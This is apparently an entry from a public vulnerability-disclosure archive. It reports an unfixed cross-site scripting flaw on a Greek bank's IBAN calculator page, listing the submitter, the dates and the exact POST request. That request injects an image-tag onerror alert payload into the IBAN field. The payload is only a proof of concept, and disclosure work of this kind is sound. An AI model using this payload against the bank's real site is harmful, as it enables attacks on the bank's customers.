Security researcher Hexspirit submitted a cross-site scripting (XSS) vulnerability affecting www.millenniumbank.gr on 08/05/2009. At the time of submission the site ranked 247136 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/05/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 08/05/2009
Date published: 10/05/2009
Status: UNFIXED
Author: Hexspirit
Domain: www.millenniumbank.gr
Category: XSS
Pagerank: 247136
URL: http://www.millenniumbank.gr/MillenniumVB/Templates_NB_Tools/NB_PopUp_IBANCalculator.aspx?LANGID=30&MENU=CALC
POST: __VIEWSTATE=[VIEWSTATE value omitted]&_ctl0%3AtxtAccountNo=&_ctl0%3AtxtIBANCheck=%3Cimg+src%3Dk+onerror%3Dalert%28%2FXSS%2F%29+%2F%3E&_ctl0%3AbtnCheckIBAN=%CE%88%CE%BB%CE%B5%CE%B3%CF%87%CE%BF%CF%82